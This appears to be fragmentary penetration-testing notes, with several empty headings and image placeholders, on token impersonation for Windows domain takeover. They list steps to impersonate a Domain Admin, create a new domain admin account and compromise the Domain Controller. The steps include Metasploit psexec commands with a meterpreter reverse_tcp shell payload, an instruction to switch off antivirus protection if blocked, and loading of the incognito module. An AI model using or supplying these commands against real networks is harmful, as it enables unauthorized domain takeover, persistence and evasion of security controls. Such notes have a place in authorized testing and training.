Overview

Why It’s Bad:

What if a Domain Admin Token is Available?

Better Example:

  1. Impersonate a Domain Admin.
  2. Add a new user with Domain Admin privileges.
  3. Compromise the Domain Controller (DC).

Steps

  1. Metasploit

    msfconsole
    use exploit/windows/smb/psexec
    set payload windows/x64/meterpreter/reverse_tcp
    set rhosts, smbuser, smbpass, smbdomain
    exploit {Turn off Virus & threat protection if denied}
    
  2. Load the incognito module

    load incognito
    

    image.png

    image.png

    image.png